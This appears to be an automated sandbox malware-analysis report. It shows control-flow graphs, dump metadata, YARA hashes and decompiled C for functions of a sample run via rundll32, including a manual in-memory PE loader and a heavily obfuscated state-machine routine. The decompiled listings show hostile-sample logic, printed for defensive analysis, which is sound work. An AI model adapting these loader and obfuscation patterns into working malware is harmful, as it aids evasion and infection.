                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 36 10002280-100022a7 call 10001990 39 100022b0-100022c1 36->39 40 100022a9-100022ab 36->40 42 100022c3-100022d0 SetLastError 39->42 43 100022d5-100022f0 call 10001990 39->43 41 1000269a-1000269d 40->41 42->41 46 100022f2-100022f4 43->46 47 100022f9-1000230e 43->47 46->41 48 10002310-1000231d SetLastError 47->48 49 10002322-1000232f 47->49 48->41 50 10002331-1000233e SetLastError 49->50 51 10002343-1000234c 49->51 50->41 52 10002360-10002381 51->52 53 1000234e-1000235b SetLastError 51->53 54 10002395-1000239f 52->54 53->41 55 100023a1-100023a8 54->55 56 100023d7-10002412 GetNativeSystemInfo 54->56 57 100023b8-100023c4 55->57 58 100023aa-100023b6 55->58 59 10002414-10002421 SetLastError 56->59 60 10002426-10002445 VirtualAlloc 56->60 63 100023c7-100023cd 57->63 58->63 59->41 61 10002472-1000248a GetProcessHeap HeapAlloc 60->61 62 10002447-10002461 VirtualAlloc 60->62 65 100024ac-10002510 call 10001990 61->65 66 1000248c-100024a7 VirtualFree SetLastError 61->66 62->61 64 10002463-1000246d SetLastError 62->64 67 100023d5 63->67 68 100023cf-100023d2 63->68 64->41 72 10002512 65->72 73 1000251c-10002581 VirtualAlloc call 10001810 call 100019c0 65->73 66->41 67->54 68->67 74 1000268c-10002698 call 10002840 72->74 81 10002583 73->81 82 1000258d-1000259e 73->82 74->41 81->74 83 100025a0-100025b6 call 10001eb0 82->83 84 100025b8-100025bb 82->84 86 100025c2-100025d0 call 10001ff0 83->86 84->86 90 100025d2 86->90 91 100025dc-100025ea call 10001cb0 86->91 90->74 94 100025f6-10002604 call 10001e30 91->94 95 100025ec 91->95 98 10002606 94->98 99 1000260d-10002616 94->99 95->74 98->74 100 10002618-1000261f 99->100 101 1000267d-10002680 99->101 102 10002621-10002643 call 35d80c 100->102 103 1000266a-10002678 100->103 104 10002687-1000268a 101->104 106 10002646-1000264d 102->106 105 1000267b 103->105 104->41 105->104 107 1000265e-10002668 106->107 108 1000264f-1000265a SetLastError 106->108 107->105 108->74
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10001990: SetLastError.KERNEL32(0000000D,?,?,100022A5,10012839,00000040), ref: 100019A1
                                                                                                                      • SetLastError.KERNEL32(000000C1,10012839,00000040), ref: 100022C8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1452528299-0
                                                                                                                      • Opcode ID: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                      • Instruction ID: 346a8eef4056a92d897d0963d9e5b5a8ca828aef95f805bf3d5880fe5d8ad0e4
                                                                                                                      • Opcode Fuzzy Hash: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                      • Instruction Fuzzy Hash: 18E14974A00209DFEB48CF94C990AAEB7F6FF88340F208559E905AB359DB75AD42CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00355CF9 Relevance: 10.3, Strings: 8, Instructions: 349COMMONCrypto
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 148 355cf9-356280 149 356288-35628e 148->149 150 356294-35629a 149->150 151 35646c-35647a call 35e35a 149->151 152 3562a0-3562a6 150->152 153 35648d-3564ad call 349700 150->153 164 35647f-356485 151->164 156 356427-35642d 152->156 157 3562ac-3562b2 152->157 159 3564b2-3564b7 153->159 160 356462-356467 156->160 161 35642f-356433 156->161 162 356368-35638e call 34ea7b 157->162 163 3562b8-3562be 157->163 165 3564b8-3564c4 159->165 160->149 166 356435-35643c 161->166 167 35645a-356460 161->167 174 356393-356422 call 3612a8 call 34ab66 call 34e7ce call 34ae03 162->174 169 356337-356363 call 361310 163->169 170 3562c0-3562c6 163->170 164->149 171 35648b 164->171 172 35644a-356453 166->172 167->160 167->161 169->149 170->164 175 3562cc-356303 call 34ab66 call 35fc96 170->175 171->165 177 356455-356457 172->177 178 35643e-356442 172->178 174->149 186 356308-356332 call 34ae03 175->186 177->167 178->177 181 356444-356447 178->181 181->172 186->164
                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E00355CF9() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed short* _t381;
				signed int _t393;
				signed int* _t395;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t407;
				signed int* _t428;
				void* _t429;
				signed short* _t435;
				signed int* _t436;

				_t436 =  &_v1720;
				_v1644 = 0xf4f2e5;
				_v1644 = _v1644 << 6;
				_t397 = 0x4a;
				_v1644 = _v1644 / _t397;
				_v1644 = _v1644 ^ 0x00d3d8d4;
				_t395 = 0;
				_v1660 = 0x8afd01;
				_t429 = 0xc405385;
				_v1660 = _v1660 | 0xf6dee043;
				_v1660 = _v1660 ^ 0x10b315be;
				_t398 = 0x45;
				_v1660 = _v1660 / _t398;
				_v1660 = _v1660 ^ 0x035da190;
				_v1692 = 0xc25321;
				_v1692 = _v1692 | 0x3e4ae4fc;
				_t399 = 0x12;
				_v1692 = _v1692 * 0x47;
				_v1692 = _v1692 ^ 0x6159278c;
				_v1692 = _v1692 ^ 0x0b15fa01;
				_v1572 = 0xf82306;
				_v1572 = _v1572 | 0xe3d21ea1;
				_v1572 = _v1572 ^ 0xe3f9e5ad;
				_v1676 = 0x48d4cb;
				_v1676 = _v1676 << 4;
				_v1676 = _v1676 + 0xffff2f85;
				_v1676 = _v1676 + 0x9649;
				_v1676 = _v1676 ^ 0x048c097a;
				_v1584 = 0x8f76c2;
				_v1584 = _v1584 * 0x1d;
				_v1584 = _v1584 ^ 0x10457475;
				_v1596 = 0xadf885;
				_v1596 = _v1596 ^ 0xa065608b;
				_v1596 = _v1596 ^ 0xa0c2245b;
				_v1684 = 0xeb1e45;
				_v1684 = _v1684 + 0x7cda;
				_v1684 = _v1684 / _t399;
				_v1684 = _v1684 + 0xffffa266;
				_v1684 = _v1684 ^ 0x0000adef;
				_v1632 = 0x65fdd9;
				_v1632 = _v1632 + 0xb49;
				_v1632 = _v1632 + 0xfffffa9d;
				_v1632 = _v1632 ^ 0x00600454;
				_v1716 = 0x9184ac;
				_v1716 = _v1716 + 0xffff0d2e;
				_v1716 = _v1716 | 0x6897691f;
				_v1716 = _v1716 ^ 0x2cb5e262;
				_v1716 = _v1716 ^ 0x442095be;
				_v1576 = 0x53941d;
				_v1576 = _v1576 >> 2;
				_v1576 = _v1576 ^ 0x001525d4;
				_v1640 = 0xd435ce;
				_v1640 = _v1640 + 0xffff1394;
				_v1640 = _v1640 + 0xffff8dc5;
				_v1640 = _v1640 ^ 0x00d594ec;
				_v1708 = 0x173594;
				_v1708 = _v1708 ^ 0xe44a87fe;
				_v1708 = _v1708 << 7;
				_v1708 = _v1708 + 0xee7d;
				_v1708 = _v1708 ^ 0x2ed8d8cc;
				_v1700 = 0x94f2ae;
				_v1700 = _v1700 << 3;
				_v1700 = _v1700 << 6;
				_v1700 = _v1700 * 0x58;
				_v1700 = _v1700 ^ 0x66d58e50;
				_v1604 = 0xd84545;
				_v1604 = _v1604 | 0x98cc5948;
				_v1604 = _v1604 ^ 0x98d8436e;
				_v1668 = 0xea4a2f;
				_v1668 = _v1668 + 0xf7bd;
				_v1668 = _v1668 >> 7;
				_v1668 = _v1668 ^ 0xf693418b;
				_v1668 = _v1668 ^ 0xf6966bd3;
				_v1580 = 0xa2c8e;
				_v1580 = _v1580 + 0x2944;
				_v1580 = _v1580 ^ 0x00011cb1;
				_v1720 = 0x34ce8d;
				_v1720 = _v1720 | 0xf5ffffea;
				_v1720 = _v1720 >> 9;
				_v1720 = _v1720 ^ 0x00732654;
				_v1564 = 0x8a9f58;
				_v1564 = _v1564 + 0x7c05;
				_v1564 = _v1564 ^ 0x008f283e;
				_v1588 = 0xa4f562;
				_v1588 = _v1588 ^ 0x7b7d16a6;
				_v1588 = _v1588 ^ 0x7bd14885;
				_v1704 = 0xee28fd;
				_v1704 = _v1704 + 0xffffe5b2;
				_v1704 = _v1704 + 0xffff824b;
				_v1704 = _v1704 + 0x581e;
				_v1704 = _v1704 ^ 0x00e0f0ab;
				_v1712 = 0x91da58;
				_v1712 = _v1712 << 3;
				_v1712 = _v1712 << 0xd;
				_v1712 = _v1712 ^ 0x485191fe;
				_v1712 = _v1712 ^ 0x920a86f0;
				_v1624 = 0xf1deea;
				_t400 = 3;
				_v1624 = _v1624 / _t400;
				_t401 = 0x38;
				_v1624 = _v1624 * 0x4f;
				_v1624 = _v1624 ^ 0x18ea6ffc;
				_v1680 = 0x898c63;
				_v1680 = _v1680 * 0x6a;
				_v1680 = _v1680 * 0x38;
				_v1680 = _v1680 | 0xa82efbb3;
				_v1680 = _v1680 ^ 0xfd6ff7e4;
				_v1688 = 0xae251e;
				_v1688 = _v1688 << 3;
				_v1688 = _v1688 >> 0xf;
				_v1688 = _v1688 + 0xb719;
				_v1688 = _v1688 ^ 0x000aff47;
				_v1696 = 0x40e656;
				_v1696 = _v1696 | 0x21fda4e6;
				_v1696 = _v1696 + 0xca7;
				_v1696 = _v1696 << 0xa;
				_v1696 = _v1696 ^ 0xf7c0cc6c;
				_v1652 = 0x8f24c5;
				_v1652 = _v1652 << 0xb;
				_v1652 = _v1652 ^ 0x5fc65761;
				_v1652 = _v1652 ^ 0x26eed855;
				_v1600 = 0xeb50f4;
				_v1600 = _v1600 | 0xe5f9ced2;
				_v1600 = _v1600 ^ 0xe5f6f1e5;
				_v1672 = 0x2ac6e7;
				_v1672 = _v1672 / _t401;
				_v1672 = _v1672 + 0xffffde53;
				_v1672 = _v1672 + 0xffff94e0;
				_v1672 = _v1672 ^ 0x000ac548;
				_v1648 = 0x7ee323;
				_v1648 = _v1648 ^ 0xc4404dab;
				_v1648 = _v1648 << 2;
				_v1648 = _v1648 ^ 0x10f162dd;
				_v1568 = 0xe6f77a;
				_v1568 = _v1568 | 0x9ec6220d;
				_v1568 = _v1568 ^ 0x9ee5ede4;
				_v1616 = 0x905f8c;
				_v1616 = _v1616 + 0xffff5c7c;
				_v1616 = _v1616 >> 2;
				_v1616 = _v1616 ^ 0x0024325f;
				_v1592 = 0xde4b6;
				_v1592 = _v1592 * 0x3f;
				_v1592 = _v1592 ^ 0x03679ec9;
				_v1664 = 0xe0cee4;
				_v1664 = _v1664 >> 2;
				_v1664 = _v1664 * 0x13;
				_v1664 = _v1664 * 0x71;
				_v1664 = _v1664 ^ 0xd75e35a6;
				_v1636 = 0x97f252;
				_v1636 = _v1636 | 0xcb237ae2;
				_v1636 = _v1636 << 0xf;
				_v1636 = _v1636 ^ 0xfd7df459;
				_v1656 = 0xc6c2a7;
				_v1656 = _v1656 + 0x66f2;
				_v1656 = _v1656 >> 0x10;
				_v1656 = _v1656 | 0xc8135773;
				_v1656 = _v1656 ^ 0xc81a6fdc;
				_v1608 = 0xd95490;
				_v1608 = _v1608 + 0xffff3702;
				_v1608 = _v1608 ^ 0x00d9a4ac;
				_v1612 = 0x2487c2;
				_t435 = _v1608;
				_v1612 = _v1612 * 0x77;
				_v1612 = _v1612 << 4;
				_v1612 = _v1612 ^ 0x0fb1a599;
				_v1620 = 0xa1030c;
				_v1620 = _v1620 >> 3;
				_v1620 = _v1620 << 0x10;
				_v1620 = _v1620 ^ 0x20685173;
				_v1628 = 0xb9794c;
				_v1628 = _v1628 >> 0xa;
				_v1628 = _v1628 >> 4;
				_v1628 = _v1628 ^ 0x0003794a;
				while(_t429 != 0x35deb36) {
					if(_t429 == 0x3b58d4d) {
						_push(_v1628);
						_push(_v1620);
						_push(_v1612);
						_push(_t395);
						_push(_t395);
						_push(_v1608);
						_push(_t401);
						_push(_t395);
						E00349700(_t435, _v1656, __eflags);
						_t395 = 1;
						__eflags = 1;
						L23:
						return _t395;
					}
					if(_t429 == 0x7ac99d0) {
						_t381 = _t435;
						__eflags =  *_t435 - _t395;
						if(__eflags == 0) {
							L18:
							_t429 = 0xe3616dc;
							continue;
						} else {
							goto L11;
						}
						do {
							L11:
							__eflags =  *_t381 - 0x2c;
							if( *_t381 != 0x2c) {
								goto L17;
							}
							_t428 =  &_v1560;
							while(1) {
								_t381 =  &(_t381[1]);
								_t407 =  *_t381 & 0x0000ffff;
								__eflags = _t407;
								if(_t407 == 0) {
									break;
								}
								__eflags = _t407 - 0x20;
								if(_t407 == 0x20) {
									break;
								}
								 *_t428 = _t407;
								_t428 =  &(_t428[0]);
								__eflags = _t428;
							}
							_t401 = 0;
							__eflags = 0;
							 *_t428 = 0;
							L17:
							_t381 =  &(_t381[1]);
							__eflags =  *_t381 - _t395;
						} while (__eflags != 0);
						goto L18;
					}
					if(_t429 == 0x94e99a1) {
						_push(_t401);
						E0034EA7B( &_v520, _v1580, _v1644, _t401, _v1720, _v1564, _v1588); // executed
						E003612A8(_t401, _v1704, __eflags, _v1712, _v1624,  &_v1040);
						_push(_v1652);
						_push(_v1696);
						_push(0x3411dc);
						E0034E7CE(E0034AB66(_v1680, _v1688, __eflags), __eflags, _v1600,  &_v520, _v1680, _v1672, _v1648, _v1568, _v1616,  &_v1040);
						_t401 = _v1592;
						E0034AE03(_t401, _v1664, _v1636, _t385);
						_t436 =  &(_t436[0x17]);
						_t429 = 0x3b58d4d;
						continue;
					}
					if(_t429 == 0xc405385) {
						_t401 = 0x208;
						E00361310(0x208,  &_v1560, _v1660, _v1692, _v1572, _v1676);
						_t436 =  &(_t436[4]);
						_t429 = 0x35deb36;
						continue;
					}
					_t445 = _t429 - 0xe3616dc;
					if(_t429 == 0xe3616dc) {
						_push(_v1716);
						_push(_v1632);
						_push(0x34115c);
						_t393 = E0035FC96(_v1576, _v1640, E0034AB66(_v1596, _v1684, _t445), _v1708,  &_v1560); // executed
						asm("sbb edi, edi");
						_t401 = _v1700;
						_t429 = ( ~_t393 & 0x02043081) + 0x74a6920;
						E0034AE03(_t401, _v1604, _v1668, _t391);
						_t436 =  &(_t436[8]);
					}
					L20:
					if(_t429 != 0x74a6920) {
						continue;
					}
					goto L23;
				}
				_t435 = E0035E35A();
				_t429 = 0x7ac99d0;
				goto L20;
			}



























































                                                                                                                      0x00355cf9
                                                                                                                      0x00355cff
                                                                                                                      0x00355d09
                                                                                                                      0x00355d18
                                                                                                                      0x00355d1d
                                                                                                                      0x00355d23
                                                                                                                      0x00355d2b
                                                                                                                      0x00355d2d
                                                                                                                      0x00355d35
                                                                                                                      0x00355d3a
                                                                                                                      0x00355d42
                                                                                                                      0x00355d4e
                                                                                                                      0x00355d53
                                                                                                                      0x00355d59
                                                                                                                      0x00355d61
                                                                                                                      0x00355d69
                                                                                                                      0x00355d76
                                                                                                                      0x00355d77
                                                                                                                      0x00355d7b
                                                                                                                      0x00355d83
                                                                                                                      0x00355d8b
                                                                                                                      0x00355d96
                                                                                                                      0x00355da1
                                                                                                                      0x00355dac
                                                                                                                      0x00355db4
                                                                                                                      0x00355db9
                                                                                                                      0x00355dc1
                                                                                                                      0x00355dc9
                                                                                                                      0x00355dd1
                                                                                                                      0x00355de4
                                                                                                                      0x00355deb
                                                                                                                      0x00355df6
                                                                                                                      0x00355e01
                                                                                                                      0x00355e0c
                                                                                                                      0x00355e17
                                                                                                                      0x00355e1f
                                                                                                                      0x00355e2d
                                                                                                                      0x00355e31
                                                                                                                      0x00355e39
                                                                                                                      0x00355e41
                                                                                                                      0x00355e49
                                                                                                                      0x00355e51
                                                                                                                      0x00355e59
                                                                                                                      0x00355e61
                                                                                                                      0x00355e69
                                                                                                                      0x00355e71
                                                                                                                      0x00355e79
                                                                                                                      0x00355e81
                                                                                                                      0x00355e89
                                                                                                                      0x00355e94
                                                                                                                      0x00355e9c
                                                                                                                      0x00355ea7
                                                                                                                      0x00355eaf
                                                                                                                      0x00355eb7
                                                                                                                      0x00355ebf
                                                                                                                      0x00355ec7
                                                                                                                      0x00355ecf
                                                                                                                      0x00355ed7
                                                                                                                      0x00355edc
                                                                                                                      0x00355ee4
                                                                                                                      0x00355eec
                                                                                                                      0x00355ef4
                                                                                                                      0x00355ef9
                                                                                                                      0x00355f03
                                                                                                                      0x00355f09
                                                                                                                      0x00355f11
                                                                                                                      0x00355f1c
                                                                                                                      0x00355f27
                                                                                                                      0x00355f32
                                                                                                                      0x00355f3a
                                                                                                                      0x00355f42
                                                                                                                      0x00355f47
                                                                                                                      0x00355f4f
                                                                                                                      0x00355f57
                                                                                                                      0x00355f62
                                                                                                                      0x00355f6d
                                                                                                                      0x00355f78
                                                                                                                      0x00355f80
                                                                                                                      0x00355f88
                                                                                                                      0x00355f8d
                                                                                                                      0x00355f95
                                                                                                                      0x00355fa0
                                                                                                                      0x00355fab
                                                                                                                      0x00355fb6
                                                                                                                      0x00355fc1
                                                                                                                      0x00355fcc
                                                                                                                      0x00355fd7
                                                                                                                      0x00355fdf
                                                                                                                      0x00355fe7
                                                                                                                      0x00355fef
                                                                                                                      0x00355ff7
                                                                                                                      0x00355fff
                                                                                                                      0x00356007
                                                                                                                      0x0035600c
                                                                                                                      0x00356011
                                                                                                                      0x00356019
                                                                                                                      0x00356021
                                                                                                                      0x0035602f
                                                                                                                      0x00356034
                                                                                                                      0x0035603f
                                                                                                                      0x00356040
                                                                                                                      0x00356044
                                                                                                                      0x0035604c
                                                                                                                      0x00356059
                                                                                                                      0x00356062
                                                                                                                      0x00356066
                                                                                                                      0x0035606e
                                                                                                                      0x00356076
                                                                                                                      0x0035607e
                                                                                                                      0x00356083
                                                                                                                      0x00356088
                                                                                                                      0x00356090
                                                                                                                      0x00356098
                                                                                                                      0x003560a0
                                                                                                                      0x003560a8
                                                                                                                      0x003560b0
                                                                                                                      0x003560b5
                                                                                                                      0x003560bd
                                                                                                                      0x003560c5
                                                                                                                      0x003560ca
                                                                                                                      0x003560d2
                                                                                                                      0x003560da
                                                                                                                      0x003560e5
                                                                                                                      0x003560f0
                                                                                                                      0x003560fb
                                                                                                                      0x00356109
                                                                                                                      0x0035610d
                                                                                                                      0x00356115
                                                                                                                      0x0035611d
                                                                                                                      0x00356125
                                                                                                                      0x0035612d
                                                                                                                      0x00356135
                                                                                                                      0x0035613a
                                                                                                                      0x00356142
                                                                                                                      0x0035614d
                                                                                                                      0x00356158
                                                                                                                      0x00356163
                                                                                                                      0x0035616b
                                                                                                                      0x00356173
                                                                                                                      0x00356178
                                                                                                                      0x00356180
                                                                                                                      0x00356193
                                                                                                                      0x0035619a
                                                                                                                      0x003561a5
                                                                                                                      0x003561ad
                                                                                                                      0x003561b7
                                                                                                                      0x003561c0
                                                                                                                      0x003561c4
                                                                                                                      0x003561cc
                                                                                                                      0x003561d4
                                                                                                                      0x003561dc
                                                                                                                      0x003561e1
                                                                                                                      0x003561e9
                                                                                                                      0x003561f1
                                                                                                                      0x003561f9
                                                                                                                      0x003561fe
                                                                                                                      0x00356206
                                                                                                                      0x0035620e
                                                                                                                      0x00356219
                                                                                                                      0x00356224
                                                                                                                      0x0035622f
                                                                                                                      0x0035623c
                                                                                                                      0x00356243
                                                                                                                      0x00356247
                                                                                                                      0x0035624c
                                                                                                                      0x00356254
                                                                                                                      0x0035625c
                                                                                                                      0x00356261
                                                                                                                      0x00356266
                                                                                                                      0x0035626e
                                                                                                                      0x00356276
                                                                                                                      0x0035627b
                                                                                                                      0x00356280
                                                                                                                      0x00356288
                                                                                                                      0x0035629a
                                                                                                                      0x0035648d
                                                                                                                      0x00356491
                                                                                                                      0x00356495
                                                                                                                      0x0035649c
                                                                                                                      0x0035649d
                                                                                                                      0x0035649e
                                                                                                                      0x003564a9
                                                                                                                      0x003564aa
                                                                                                                      0x003564ad
                                                                                                                      0x003564b7
                                                                                                                      0x003564b7
                                                                                                                      0x003564bb
                                                                                                                      0x003564c4
                                                                                                                      0x003564c4
                                                                                                                      0x003562a6
                                                                                                                      0x00356427
                                                                                                                      0x00356429
                                                                                                                      0x0035642d
                                                                                                                      0x00356462
                                                                                                                      0x00356462
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0035642f
                                                                                                                      0x0035642f
                                                                                                                      0x0035642f
                                                                                                                      0x00356433
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00356435
                                                                                                                      0x0035644a
                                                                                                                      0x0035644a
                                                                                                                      0x0035644d
                                                                                                                      0x00356450
                                                                                                                      0x00356453
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0035643e
                                                                                                                      0x00356442
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00356444
                                                                                                                      0x00356447
                                                                                                                      0x00356447
                                                                                                                      0x00356447
                                                                                                                      0x00356455
                                                                                                                      0x00356455
                                                                                                                      0x00356457
                                                                                                                      0x0035645a
                                                                                                                      0x0035645a
                                                                                                                      0x0035645d
                                                                                                                      0x0035645d
                                                                                                                      0x00000000
                                                                                                                      0x0035642f
                                                                                                                      0x003562b2
                                                                                                                      0x00356368
                                                                                                                      0x0035638e
                                                                                                                      0x003563aa
                                                                                                                      0x003563af
                                                                                                                      0x003563b3
                                                                                                                      0x003563bf
                                                                                                                      0x003563fd
                                                                                                                      0x0035640e
                                                                                                                      0x00356415
                                                                                                                      0x0035641a
                                                                                                                      0x0035641d
                                                                                                                      0x00000000
                                                                                                                      0x0035641d
                                                                                                                      0x003562be
                                                                                                                      0x00356342
                                                                                                                      0x00356356
                                                                                                                      0x0035635b
                                                                                                                      0x0035635e
                                                                                                                      0x00000000
                                                                                                                      0x0035635e
                                                                                                                      0x003562c0
                                                                                                                      0x003562c6
                                                                                                                      0x003562cc
                                                                                                                      0x003562d0
                                                                                                                      0x003562df
                                                                                                                      0x00356303
                                                                                                                      0x00356318
                                                                                                                      0x0035631a
                                                                                                                      0x00356324
                                                                                                                      0x0035632a
                                                                                                                      0x0035632f
                                                                                                                      0x0035632f
                                                                                                                      0x0035647f
                                                                                                                      0x00356485
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0035648b
                                                                                                                      0x00356478
                                                                                                                      0x0035647a
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderPath
                                                                                                                      • String ID: #~$/J$D)$T&s$V@$_2$$sQh $}
                                                                                                                      • API String ID: 1514166925-82791160
                                                                                                                      • Opcode ID: cf82310119f8b2bf476a157fa53fb4468ca9c55399cc60bb09a1738523340cca
                                                                                                                      • Instruction ID: a7d928f06d06067a505609a1fa76122de97912877a933192b035b88864af272c
                                                                                                                      • Opcode Fuzzy Hash: cf82310119f8b2bf476a157fa53fb4468ca9c55399cc60bb09a1738523340cca
                                                                                                                      • Instruction Fuzzy Hash: D00214B25083809FD3A5CF65C58AA4BBBE1FBC5748F50891DF5DA8A260D7B08949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00349700 Relevance: 1.5, Strings: 1, Instructions: 201COMMONCrypto
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 280 349700-3499cc call 34cf25 call 361310 call 35679c 286 3499d1-3499d6 280->286 287 349a15 286->287 288 3499d8-3499da 286->288 289 349a17-349a1d 287->289 290 3499dc-3499e2 288->290 291 3499e8-349a13 call 354dad * 2 288->291 292 3499e3-3499e6 290->292 291->292 292->289
                                                                                                                      C-Code - Quality: 65%
                                                                                                                      			E00349700(WCHAR* __ecx, void* __edx, void* __eflags) {
				void* _t207;
				void* _t231;
				void* _t232;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				void* _t243;
				intOrPtr _t265;
				WCHAR* _t268;
				void* _t271;
				void* _t272;

				_t271 = _t272 - 0x58;
				_push( *((intOrPtr*)(_t271 + 0x7c)));
				_t265 =  *((intOrPtr*)(_t271 + 0x6c));
				_t268 = __ecx;
				_push( *((intOrPtr*)(_t271 + 0x78)));
				_push( *((intOrPtr*)(_t271 + 0x74)));
				_push( *((intOrPtr*)(_t271 + 0x70)));
				_push(_t265);
				_push( *((intOrPtr*)(_t271 + 0x68)));
				_push(0);
				_push( *((intOrPtr*)(_t271 + 0x60)));
				_push(__edx);
				_push(__ecx);
				E0034CF25(_t207);
				 *(_t271 + 0x40) = 0x9c1626;
				 *(_t271 + 0x40) =  *(_t271 + 0x40) << 8;
				 *(_t271 + 0x40) =  *(_t271 + 0x40) << 4;
				 *(_t271 + 0x40) =  *(_t271 + 0x40) + 0xfbea;
				 *(_t271 + 0x40) =  *(_t271 + 0x40) ^ 0xc166ab3f;
				 *(_t271 + 0x50) = 0x2d866;
				 *(_t271 + 0x50) =  *(_t271 + 0x50) + 0xffff915f;
				 *(_t271 + 0x50) =  *(_t271 + 0x50) + 0x9947;
				 *(_t271 + 0x50) =  *(_t271 + 0x50) << 8;
				 *(_t271 + 0x50) =  *(_t271 + 0x50) ^ 0x03009f0e;
				 *(_t271 + 0x1c) = 0xb11a6d;
				_t237 = 0x61;
				 *(_t271 + 0x1c) =  *(_t271 + 0x1c) * 0x53;
				 *(_t271 + 0x1c) =  *(_t271 + 0x1c) | 0x3495d398;
				 *(_t271 + 0x1c) =  *(_t271 + 0x1c) ^ 0x3dfc3820;
				 *(_t271 + 0x28) = 0x82663;
				 *(_t271 + 0x28) =  *(_t271 + 0x28) * 0x55;
				 *(_t271 + 0x28) =  *(_t271 + 0x28) / _t237;
				 *(_t271 + 0x28) =  *(_t271 + 0x28) ^ 0x000fae18;
				 *(_t271 + 0xc) = 0xaf113;
				 *(_t271 + 0xc) =  *(_t271 + 0xc) | 0x96b3e95f;
				 *(_t271 + 0xc) =  *(_t271 + 0xc) ^ 0x96be4803;
				 *(_t271 + 0x30) = 0x440ee2;
				 *(_t271 + 0x30) =  *(_t271 + 0x30) << 2;
				_t238 = 0x3a;
				 *(_t271 + 0x30) =  *(_t271 + 0x30) * 0x27;
				 *(_t271 + 0x30) =  *(_t271 + 0x30) ^ 0x297e7faa;
				 *(_t271 + 8) = 0x67057e;
				 *(_t271 + 8) =  *(_t271 + 8) ^ 0xa7e99d1b;
				 *(_t271 + 8) =  *(_t271 + 8) ^ 0xa7839d84;
				 *(_t271 + 0x38) = 0x1c9970;
				 *(_t271 + 0x38) =  *(_t271 + 0x38) * 0x7c;
				 *(_t271 + 0x38) =  *(_t271 + 0x38) + 0xffff63ab;
				 *(_t271 + 0x38) =  *(_t271 + 0x38) ^ 0x0ddf815b;
				 *(_t271 + 0x54) = 0x9de9b7;
				 *(_t271 + 0x54) =  *(_t271 + 0x54) / _t238;
				 *(_t271 + 0x54) =  *(_t271 + 0x54) | 0x8a1e8ac2;
				 *(_t271 + 0x54) =  *(_t271 + 0x54) + 0x89e3;
				 *(_t271 + 0x54) =  *(_t271 + 0x54) ^ 0x8a1a691c;
				 *(_t271 + 0x48) = 0xcb1eea;
				 *(_t271 + 0x48) =  *(_t271 + 0x48) + 0xac00;
				 *(_t271 + 0x48) =  *(_t271 + 0x48) ^ 0x8f71cfce;
				 *(_t271 + 0x48) =  *(_t271 + 0x48) ^ 0xa15123d8;
				 *(_t271 + 0x48) =  *(_t271 + 0x48) ^ 0x2ee8c557;
